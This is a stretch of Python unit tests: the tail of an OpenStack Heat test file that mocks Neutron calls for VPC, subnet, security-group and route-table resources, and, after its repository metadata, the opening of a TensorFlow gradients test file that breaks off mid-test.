'description': 'SSH access'
}
}).AndReturn({
'security_group': {
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'name': self.sg_name,
'description': 'SSH access',
'security_group_rules': [],
'id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'
}
})
neutronclient.Client.create_security_group_rule({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'
}
}).AndReturn({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': '0389f747-7785-4757-b7bb-2ab07e4b09c3',
'id': 'bbbb'
}
})
def mock_show_security_group(self, group=None):
sg_name = utils.PhysName('test_stack', 'the_sg')
group = group or '0389f747-7785-4757-b7bb-2ab07e4b09c3'
if group == '0389f747-7785-4757-b7bb-2ab07e4b09c3':
neutronclient.Client.show_security_group(group).AndReturn({
'security_group': {
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'name': sg_name,
'description': '',
'security_group_rules': [{
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'bbbb',
'ethertype': 'IPv4',
'security_group_id': ('0389f747-7785-4757-b7bb-'
'2ab07e4b09c3'),
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'port_range_min': '22'
}],
'id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'}})
elif group == 'INVALID-NO-REF':
neutronclient.Client.show_security_group(group).AndRaise(
NeutronClientException(status_code=404))
elif group == 'RaiseException':
neutronclient.Client.show_security_group(
'0389f747-7785-4757-b7bb-2ab07e4b09c3').AndRaise(
NeutronClientException(status_code=403))
def mock_delete_security_group(self):
self.mock_show_security_group()
neutronclient.Client.delete_security_group_rule(
'bbbb').AndReturn(None)
neutronclient.Client.delete_security_group(
'0389f747-7785-4757-b7bb-2ab07e4b09c3').AndReturn(None)
def mock_router_for_vpc(self):
neutronclient.Client.list_routers(name=self.vpc_name).AndReturn({
"routers": [{
"status": "ACTIVE",
"external_gateway_info": {
"network_id": "zzzz",
"enable_snat": True},
"name": self.vpc_name,
"admin_state_up": True,
"tenant_id": "3e21026f2dc94372b105808c0e721661",
"routes": [],
"id": "bbbb"
}]
})
def mock_delete_network(self):
self.mock_router_for_vpc()
neutronclient.Client.delete_router('bbbb').AndReturn(None)
neutronclient.Client.delete_network('aaaa').AndReturn(None)
def mock_delete_subnet(self):
self.mock_router_for_vpc()
neutronclient.Client.remove_interface_router(
u'bbbb',
{'subnet_id': 'cccc'}).AndReturn(None)
neutronclient.Client.delete_subnet('cccc').AndReturn(None)
def mock_create_route_table(self):
self.rt_name = utils.PhysName('test_stack', 'the_route_table')
neutronclient.Client.create_router({
'router': {'name': self.rt_name}}).AndReturn({
'router': {
'status': 'BUILD',
'name': self.rt_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'ffff'
}
})
neutronclient.Client.show_router('ffff').AndReturn({
'router': {
'status': 'BUILD',
'name': self.rt_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'ffff'
}
})
neutronclient.Client.show_router('ffff').AndReturn({
'router': {
'status': 'ACTIVE',
'name': self.rt_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'ffff'
}
})
self.mock_router_for_vpc()
neutronclient.Client.add_gateway_router(
'ffff', {'network_id': 'zzzz'}).AndReturn(None)
def mock_create_association(self):
self.mock_show_subnet()
self.mock_router_for_vpc()
neutronclient.Client.remove_interface_router(
'bbbb',
{'subnet_id': u'cccc'}).AndReturn(None)
neutronclient.Client.add_interface_router(
u'ffff',
{'subnet_id': 'cccc'}).AndReturn(None)
def mock_delete_association(self):
self.mock_show_subnet()
self.mock_router_for_vpc()
neutronclient.Client.remove_interface_router(
'ffff',
{'subnet_id': u'cccc'}).AndReturn(None)
neutronclient.Client.add_interface_router(
u'bbbb',
{'subnet_id': 'cccc'}).AndReturn(None)
def mock_delete_route_table(self):
neutronclient.Client.delete_router('ffff').AndReturn(None)
neutronclient.Client.remove_gateway_router('ffff').AndReturn(None)
def assertResourceState(self, resource, ref_id):
self.assertIsNone(resource.validate())
self.assertEqual((resource.CREATE, resource.COMPLETE), resource.state)
self.assertEqual(ref_id, resource.FnGetRefId())
class VPCTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
'''
def mock_create_network_failed(self):
self.vpc_name = utils.PhysName('test_stack', 'the_vpc')
neutronclient.Client.create_network(
{
'network': {'name': self.vpc_name}
}).AndRaise(NeutronClientException())
def test_vpc(self):
self.mock_create_network()
self.mock_delete_network()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
vpc = stack['the_vpc']
self.assertResourceState(vpc, 'aaaa')
scheduler.TaskRunner(vpc.delete)()
self.m.VerifyAll()
def test_vpc_delete_successful_if_created_failed(self):
self.mock_create_network_failed()
self.m.ReplayAll()
t = template_format.parse(self.test_template)
stack = self.parse_stack(t)
scheduler.TaskRunner(stack.create)()
self.assertEqual(stack.state, (stack.CREATE, stack.FAILED))
scheduler.TaskRunner(stack.delete)()
self.m.VerifyAll()
class SubnetTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
'''
def test_subnet(self):
self.mock_create_network()
self.mock_create_subnet()
self.mock_delete_subnet()
self.mock_delete_network()
# mock delete subnet which is already deleted
self.mock_router_for_vpc()
neutronclient.Client.remove_interface_router(
u'bbbb',
{'subnet_id': 'cccc'}).AndRaise(
NeutronClientException(status_code=404))
neutronclient.Client.delete_subnet('cccc').AndRaise(
NeutronClientException(status_code=404))
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
subnet = stack['the_subnet']
self.assertResourceState(subnet, 'cccc')
self.assertRaises(
exception.InvalidTemplateAttribute,
subnet.FnGetAtt,
'Foo')
self.assertEqual('moon', subnet.FnGetAtt('AvailabilityZone'))
scheduler.TaskRunner(subnet.delete)()
subnet.state_set(subnet.CREATE, subnet.COMPLETE, 'to delete again')
scheduler.TaskRunner(subnet.delete)()
scheduler.TaskRunner(stack['the_vpc'].delete)()
self.m.VerifyAll()
def _mock_create_subnet_failed(self):
self.subnet_name = utils.PhysName('test_stack', 'the_subnet')
neutronclient.Client.create_subnet(
{'subnet': {
'network_id': u'aaaa',
'cidr': u'10.0.0.0/24',
'ip_version': 4,
'name': self.subnet_name}}).AndReturn({
'subnet': {
'status': 'ACTIVE',
'name': self.subnet_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'cccc'}})
neutronclient.Client.show_network(
'aaaa'
).MultipleTimes().AndRaise(NeutronClientException(status_code=404))
def test_create_failed_delete_success(self):
self._mock_create_subnet_failed()
neutronclient.Client.delete_subnet('cccc').AndReturn(None)
self.m.ReplayAll()
t = template_format.parse(self.test_template)
tmpl = parser.Template(t)
stack = parser.Stack(utils.dummy_context(), 'test_subnet_', tmpl,
stack_id=str(uuid.uuid4()))
tmpl.t['Resources']['the_subnet']['Properties']['VpcId'] = 'aaaa'
resource_defns = tmpl.resource_definitions(stack)
rsrc = sn.Subnet('the_subnet',
resource_defns['the_subnet'],
stack)
rsrc.validate()
self.assertRaises(exception.ResourceFailure,
scheduler.TaskRunner(rsrc.create))
self.assertEqual((rsrc.CREATE, rsrc.FAILED), rsrc.state)
ref_id = rsrc.FnGetRefId()
self.assertEqual(u'cccc', ref_id)
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
self.assertEqual((rsrc.DELETE, rsrc.COMPLETE), rsrc.state)
self.m.VerifyAll()
class NetworkInterfaceTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_sg:
Type: AWS::EC2::SecurityGroup
Properties:
VpcId: {Ref: the_vpc}
GroupDescription: SSH access
SecurityGroupIngress:
- IpProtocol: tcp
FromPort: "22"
ToPort: "22"
CidrIp: 0.0.0.0/0
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_nic:
Type: AWS::EC2::NetworkInterface
Properties:
PrivateIpAddress: 10.0.0.100
SubnetId: {Ref: the_subnet}
GroupSet:
- Ref: the_sg
'''
test_template_no_groupset = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_nic:
Type: AWS::EC2::NetworkInterface
Properties:
PrivateIpAddress: 10.0.0.100
SubnetId: {Ref: the_subnet}
'''
test_template_error = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_sg:
Type: AWS::EC2::SecurityGroup
Properties:
VpcId: {Ref: the_vpc}
GroupDescription: SSH access
SecurityGroupIngress:
- IpProtocol: tcp
FromPort: "22"
ToPort: "22"
CidrIp: 0.0.0.0/0
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_nic:
Type: AWS::EC2::NetworkInterface
Properties:
PrivateIpAddress: 10.0.0.100
SubnetId: {Ref: the_subnet}
GroupSet:
- Ref: INVALID-REF-IN-TEMPLATE
'''
test_template_error_no_ref = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_nic:
Type: AWS::EC2::NetworkInterface
Properties:
PrivateIpAddress: 10.0.0.100
SubnetId: {Ref: the_subnet}
GroupSet:
- INVALID-NO-REF
'''
def mock_create_network_interface(
self, security_groups=['0389f747-7785-4757-b7bb-2ab07e4b09c3']):
self.nic_name = utils.PhysName('test_stack', 'the_nic')
port = {'network_id': 'aaaa',
'fixed_ips': [{
'subnet_id': u'cccc',
'ip_address': u'10.0.0.100'
}],
'name': self.nic_name,
'admin_state_up': True}
if security_groups:
port['security_groups'] = security_groups
neutronclient.Client.create_port({'port': port}).AndReturn({
'port': {
'admin_state_up': True,
'device_id': '',
'device_owner': '',
'fixed_ips': [
{
'ip_address': '10.0.0.100',
'subnet_id': 'cccc'
}
],
'id': 'dddd',
'mac_address': 'fa:16:3e:25:32:5d',
'name': self.nic_name,
'network_id': 'aaaa',
'status': 'ACTIVE',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f'
}
})
def mock_show_network_interface(self):
self.nic_name = utils.PhysName('test_stack', 'the_nic')
neutronclient.Client.show_port('dddd').AndReturn({
'port': {
'admin_state_up': True,
'device_id': '',
'device_owner': '',
'fixed_ips': [
{
'ip_address': '10.0.0.100',
'subnet_id': 'cccc'
}
],
'id': 'dddd',
'mac_address': 'fa:16:3e:25:32:5d',
'name': self.nic_name,
'network_id': 'aaaa',
'security_groups': ['0389f747-7785-4757-b7bb-2ab07e4b09c3'],
'status': 'ACTIVE',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f'
}
})
def mock_delete_network_interface(self):
neutronclient.Client.delete_port('dddd').AndReturn(None)
def test_network_interface(self):
self.mock_create_security_group()
self.mock_create_network()
self.mock_create_subnet()
self.mock_show_subnet()
self.mock_create_network_interface()
self.mock_show_network_interface()
self.mock_delete_network_interface()
self.mock_delete_subnet()
self.mock_delete_network()
self.mock_delete_security_group()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
try:
self.assertEqual((stack.CREATE, stack.COMPLETE), stack.state)
rsrc = stack['the_nic']
self.assertResourceState(rsrc, 'dddd')
self.assertEqual('10.0.0.100', rsrc.FnGetAtt('PrivateIpAddress'))
finally:
scheduler.TaskRunner(stack.delete)()
self.m.VerifyAll()
def test_network_interface_existing_groupset(self):
self.m.StubOutWithMock(parser.Stack, 'resource_by_refid')
self.mock_create_security_group()
self.mock_create_network()
self.mock_create_subnet()
self.mock_show_subnet()
self.mock_create_network_interface()
self.mock_delete_network_interface()
self.mock_delete_subnet()
self.mock_delete_network()
self.mock_delete_security_group()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
try:
self.assertEqual((stack.CREATE, stack.COMPLETE), stack.state)
rsrc = stack['the_nic']
self.assertResourceState(rsrc, 'dddd')
finally:
stack.delete()
self.m.VerifyAll()
def test_network_interface_no_groupset(self):
self.mock_create_network()
self.mock_create_subnet()
self.mock_show_subnet()
self.mock_create_network_interface(security_groups=None)
self.mock_delete_network_interface()
self.mock_delete_subnet()
self.mock_delete_network()
self.m.ReplayAll()
stack = self.create_stack(self.test_template_no_groupset)
stack.delete()
self.m.VerifyAll()
def test_network_interface_error(self):
self.assertRaises(
exception.StackValidationFailed,
self.create_stack,
self.test_template_error)
class InternetGatewayTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_gateway:
Type: AWS::EC2::InternetGateway
the_vpc:
Type: AWS::EC2::VPC
Properties:
CidrBlock: '10.0.0.0/16'
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_attachment:
Type: AWS::EC2::VPCGatewayAttachment
Properties:
VpcId: {Ref: the_vpc}
InternetGatewayId: {Ref: the_gateway}
the_route_table:
Type: AWS::EC2::RouteTable
Properties:
VpcId: {Ref: the_vpc}
the_association:
Type: AWS::EC2::SubnetRouteTableAssociation
Properties:
RouteTableId: {Ref: the_route_table}
SubnetId: {Ref: the_subnet}
'''
def mock_create_internet_gateway(self):
neutronclient.Client.list_networks(
**{'router:external': True}).AndReturn({'networks': [{
'status': 'ACTIVE',
'subnets': [],
'name': 'nova',
'router:external': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'admin_state_up': True,
'shared': True,
'id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'
}]})
def mock_create_gateway_attachment(self):
neutronclient.Client.add_gateway_router(
'ffff', {'network_id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'}
).AndReturn(None)
def mock_delete_gateway_attachment(self):
neutronclient.Client.remove_gateway_router('ffff').AndReturn(None)
def test_internet_gateway(self):
self.mock_create_internet_gateway()
self.mock_create_network()
self.mock_create_subnet()
self.mock_create_route_table()
self.mock_create_association()
self.mock_create_gateway_attachment()
self.mock_delete_gateway_attachment()
self.mock_delete_association()
self.mock_delete_route_table()
self.mock_delete_subnet()
self.mock_delete_network()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
gateway = stack['the_gateway']
self.assertResourceState(gateway, gateway.physical_resource_name())
attachment = stack['the_attachment']
self.assertResourceState(attachment, 'the_attachment')
route_table = stack['the_route_table']
self.assertEqual(list(attachment._vpc_route_tables()), [route_table])
stack.delete()
self.m.VerifyAll()
class RouteTableTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties:
CidrBlock: '10.0.0.0/16'
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_route_table:
Type: AWS::EC2::RouteTable
Properties:
VpcId: {Ref: the_vpc}
the_association:
Type: AWS::EC2::SubnetRouteTableAssociation
Properties:
RouteTableId: {Ref: the_route_table}
SubnetId: {Ref: the_subnet}
'''
def test_route_table(self):
self.mock_create_network()
self.mock_create_subnet()
self.mock_create_route_table()
self.mock_create_association()
self.mock_delete_association()
self.mock_delete_route_table()
self.mock_delete_subnet()
self.mock_delete_network()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
route_table = stack['the_route_table']
self.assertResourceState(route_table, 'ffff')
association = stack['the_association']
self.assertResourceState(association, 'the_association')
scheduler.TaskRunner(association.delete)()
scheduler.TaskRunner(route_table.delete)()
stack.delete()
self.m.VerifyAll()
|
{
"content_hash": "7da5abbaeee577083a8e0638b140ad5e",
"timestamp": "",
"source": "github",
"line_count": 836,
"max_line_length": 79,
"avg_line_length": 34.188995215311,
"alnum_prop": 0.5567140158141488,
"repo_name": "redhat-openstack/heat",
"id": "a65c292179dfca1a9972a2d3d14f854370a8d6cb",
"size": "29157",
"binary": false,
"copies": "1",
"ref": "refs/heads/f22-patches",
"path": "heat/tests/test_vpc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4827027"
},
{
"name": "Shell",
"bytes": "26720"
}
],
"symlink_target": ""
}
|
"""Tests for tensorflow.ops.gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import warnings
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.constant_op import constant
from tensorflow.python.ops import array_grad # pylint: disable=unused-import
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import data_flow_ops # pylint: disable=unused-import
from tensorflow.python.ops import functional_ops # pylint: disable=unused-import
from tensorflow.python.ops import gradients
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_grad # pylint: disable=unused-import
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import state_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.nn_ops import bias_add
from tensorflow.python.platform import googletest
def _OpsBetween(graph, to_ops, from_ops):
"""Build the list of operations between two lists of Operations.
Args:
graph: a Graph.
to_ops: list of Operations.
from_ops: list of Operations.
Returns:
The list of operations between "from_ops" and "to_ops", sorted by
decreasing operation id. This list contains all elements of to_ops.
TODO(touts): Think about returning an empty list if from_ops are not
reachable from to_ops. Presently it returns to_ops in that case.
"""
# List of booleans, indexed by operation id, indicating if
# an op is reached from the output of "input_ops".
reached_ops = [False] * (graph._last_id + 1)
# We only care to reach up to "output_ops" so we mark the
# output ops as reached to avoid recursing past them.
for op in to_ops:
reached_ops[op._id] = True
gradients_impl._MarkReachedOps(from_ops, reached_ops)
between_ops = gradients_impl._GatherInputs(to_ops, reached_ops)
between_ops.sort(key=lambda x: -x._id)
return between_ops
class GradientsTest(test_util.TensorFlowTestCase):
def _OpNames(self, op_list):
return ["%s/%d" % (str(op.name), op._id) for op in op_list]
def _assertOpListEqual(self, ops1, ops2):
    self.assertEqual(self._OpNames(ops1), self._OpNames(ops2))
def testOpsBetweenSimple(self):
with ops.Graph().as_default() as g:
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
# Full graph
self._assertOpListEqual([t3.op, t2.op, t1.op],
_OpsBetween(g, [t3.op], [t1.op, t2.op]))
# Only t1, t3.
self._assertOpListEqual([t3.op, t1.op], _OpsBetween(g, [t3.op], [t1.op]))
def testOpsBetweenUnreachable(self):
with ops.Graph().as_default() as g:
t1 = constant(1.0)
t2 = constant(2.0)
_ = array_ops.stack([t1, t2])
t4 = constant(1.0)
t5 = constant(2.0)
t6 = array_ops.stack([t4, t5])
# Elements of to_ops are always listed.
self._assertOpListEqual([t6.op], _OpsBetween(g, [t6.op], [t1.op]))
def testOpsBetweenCut(self):
with ops.Graph().as_default() as g:
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
t4 = constant([1.0])
t5 = array_ops.concat([t4, t3], 0)
t6 = constant([2.0])
t7 = array_ops.concat([t5, t6], 0)
self._assertOpListEqual([t7.op, t5.op, t4.op],
_OpsBetween(g, [t7.op], [t4.op]))
def testOpsBetweenCycle(self):
with ops.Graph().as_default() as g:
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
t4 = array_ops.concat([t3, t3, t3], 0)
t5 = constant([1.0])
t6 = array_ops.concat([t4, t5], 0)
t7 = array_ops.concat([t6, t3], 0)
self._assertOpListEqual([t6.op, t4.op, t3.op],
_OpsBetween(g, [t6.op], [t3.op]))
self._assertOpListEqual([t7.op, t6.op, t5.op, t4.op, t3.op, t1.op],
_OpsBetween(g, [t7.op], [t1.op, t5.op]))
self._assertOpListEqual([t6.op, t5.op, t4.op, t3.op, t2.op],
_OpsBetween(g, [t6.op], [t2.op, t5.op]))
def testGradients(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[32, 100], name="in")
w = constant(1.0, shape=[100, 10], name="w")
b = constant(1.0, shape=[10], name="b")
xw = math_ops.matmul(inp, w, name="xw")
h = bias_add(xw, b, name="h")
w_grad = gradients.gradients(h, w)[0]
self.assertEquals("MatMul", w_grad.op.type)
self.assertEquals(w_grad.op._original_op, xw.op)
self.assertTrue(w_grad.op.get_attr("transpose_a"))
self.assertFalse(w_grad.op.get_attr("transpose_b"))
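      # Illustrative note (not from the original test): for h = matmul(x, w)
      # the chain rule gives dL/dw = x^T @ dL/dh, which TensorFlow emits as
      # a MatMul that reuses x with transpose_a=True. The shapes check out:
      # x is [32, 100] and dL/dh is [32, 10], so dL/dw is [100, 10],
      # matching w.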
def testUnusedOutput(self):
with ops.Graph().as_default():
w = constant(1.0, shape=[2, 2])
x = constant(1.0, shape=[2, 2])
wx = math_ops.matmul(w, x)
split_wx = array_ops.split(value=wx, num_or_size_splits=2, axis=0)
c = math_ops.reduce_sum(split_wx[1])
gw = gradients.gradients(c, [w])[0]
self.assertEquals("MatMul", gw.op.type)
def testColocateGradients(self):
with ops.Graph().as_default() as g:
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
with g.device("/gpu:0"):
wx = math_ops.matmul(w, x)
gw = gradients.gradients(wx, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw.op.colocation_groups(), wx.op.colocation_groups())
def testColocateGradientsWithAggregation(self):
with ops.Graph().as_default() as g:
with g.device("/gpu:1"):
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
y = constant(1.0, shape=[1, 2])
wx = math_ops.matmul(w, x)
wy = math_ops.matmul(w, y)
with g.device("/gpu:0"):
z = wx + wy
gw1 = gradients.gradients(z, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw1.op.colocation_groups(), wx.op.colocation_groups())
gw2 = gradients.gradients(z, [w], colocate_gradients_with_ops=False)[0]
self.assertTrue(wx.op.colocation_groups() != gw2.op.colocation_groups())
def testColocateGradientsWithAggregationInMultipleDevices(self):
with ops.Graph().as_default() as g:
with g.device("/gpu:1"):
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
y = constant(1.0, shape=[1, 2])
with g.device("/task:1"):
wx = math_ops.matmul(w, x)
with g.device("/task:2"):
wy = math_ops.matmul(w, y)
with g.device("/gpu:0"):
z = wx + wy
gw1 = gradients.gradients(z, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw1.op.colocation_groups(), w.op.colocation_groups())
gw2 = gradients.gradients(z, [w], colocate_gradients_with_ops=False)[0]
self.assertTrue(w.op.colocation_groups() != gw2.op.colocation_groups())
def testBoundaryStop(self):
# Test that we don't differentiate 'x'. The gradient function for 'x' is
# set explicitly to None so we will get an exception if the gradient code
# tries to differentiate 'x'.
with ops.Graph().as_default():
c = constant(1.0)
x = array_ops.identity(c)
y = x + 1.0
z = y + 1
grads = gradients.gradients(z, [x])
self.assertTrue(all(x is not None for x in grads))
def testBoundaryContinue(self):
# Test that we differentiate both 'x' and 'y' correctly when x is a
# predecessor of y.
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y * 3.0
grads = gradients.gradients(z, [x, y])
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(6.0, grads[0].eval())
def testAggregationMethodAccumulateN(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y],
aggregation_method=gradients.AggregationMethod.
EXPERIMENTAL_ACCUMULATE_N)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testAggregationMethodAddN(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y], aggregation_method=gradients.AggregationMethod.ADD_N)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testAggregationMethodTree(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y],
aggregation_method=gradients.AggregationMethod.EXPERIMENTAL_TREE)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testNoGradientForStringOutputs(self):
with ops.Graph().as_default():
def _TestOpGrad(_, float_grad, string_grad):
"""Gradient function for TestStringOutput."""
        self.assertEqual(float_grad.dtype, dtypes.float32)
self.assertFalse(string_grad)
return float_grad
ops.RegisterGradient("TestStringOutput")(_TestOpGrad)
c = constant(1.0)
x, _ = test_ops.test_string_output(c)
z = x * 2.0
w = z * 3.0
grads = gradients.gradients(z, [c])
self.assertTrue(isinstance(grads[0], ops.Tensor))
grads = gradients.gradients(w, [c])
self.assertTrue(isinstance(grads[0], ops.Tensor))
def testSingletonIndexedSlices(self):
with ops.Graph().as_default():
x = array_ops.placeholder(dtypes.float32)
y = array_ops.identity(x)
dy = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32))
dx, = gradients.gradients(y, x, grad_ys=dy)
# The gradient of tf.identity should pass the value through unchanged.
# A previous version of the code did this only for tf.Tensor, not
# tf.IndexedSlices.
self.assertEqual(dx, dy)
def testNonDifferentiableSwitchInWhileLoop(self):
with ops.Graph().as_default():
v = array_ops.placeholder(dtypes.float32, [])
def _Step(i, a, ta):
a += math_ops.cast(v, dtypes.int32)
return (i + 1, a, ta.write(i, a))
n = 4
i, _, ta = control_flow_ops.while_loop(
lambda i, *_: i < n,
_Step, [0, 0, tensor_array_ops.TensorArray(
dtypes.int32, size=n)])
target = ta.read(i - 1)
grad, = gradients.gradients(target, v)
self.assertIsNone(grad)
def testVariableReadValueGradient(self):
with ops.Graph().as_default():
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(var.read_value(), var)
self.assertIsNotNone(gradient)
def testVariableAsGraphElementGradient(self):
with ops.Graph().as_default() as graph:
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(graph.as_graph_element(var), var)
self.assertIsNotNone(gradient)
def testVariableRefGradient(self):
with ops.Graph().as_default():
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(var._ref(), var)
self.assertIsNotNone(gradient)
def testDependentYs(self):
with self.test_session():
x = constant_op.constant(3.0)
y = math_ops.square(x)
y1 = math_ops.square(y)
y2 = math_ops.square(y1)
g = gradients.gradients([y, y2], x)
self.assertAllClose(17502.0, g[0].eval())
g = gradients.gradients(y + y2, x)
self.assertAllClose(17502.0, g[0].eval())
z = array_ops.identity(y)
z2 = array_ops.identity(y2)
g = gradients.gradients([z, z2], x)
self.assertAllClose(17502.0, g[0].eval())
class FunctionGradientsTest(test_util.TensorFlowTestCase):
@classmethod
def XSquarePlusB(cls, x, b):
return x * x + b
@classmethod
def XSquarePlusBGradient(cls, x, b, g):
# Perturb gradients (multiply by 2), so we can test that this was called.
g *= 2.0
return g * 2.0 * x, g
@classmethod
def _PythonGradient(cls, op, grad):
# Perturb gradients (multiply by 3), so we can test that this was called.
grad *= 3.0
return grad * op.inputs[0] * 2.0, grad
@classmethod
def _GetFunc(cls, **kwargs):
return function.Defun(dtypes.float32, dtypes.float32, **
kwargs)(cls.XSquarePlusB)
def _GetFuncGradients(self, f, x_value, b_value):
x = constant_op.constant(x_value, name="x")
b = constant_op.constant(b_value, name="b")
y = f(x, b)
grads = gradients.gradients(y, [x, b])
with self.test_session() as sess:
return sess.run(grads)
def testFunctionGradientsBasic(self):
g = ops.Graph()
with g.as_default():
f = self._GetFunc()
# Get gradients (should add SymbolicGradient node for function).
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0], grads[0])
self.assertAllEqual([1.0], grads[1])
def testFunctionGradientsComposition(self):
with ops.Graph().as_default():
f = self._GetFunc()
x = constant_op.constant([2.0], name="x")
b1 = constant_op.constant([1.0], name="b1")
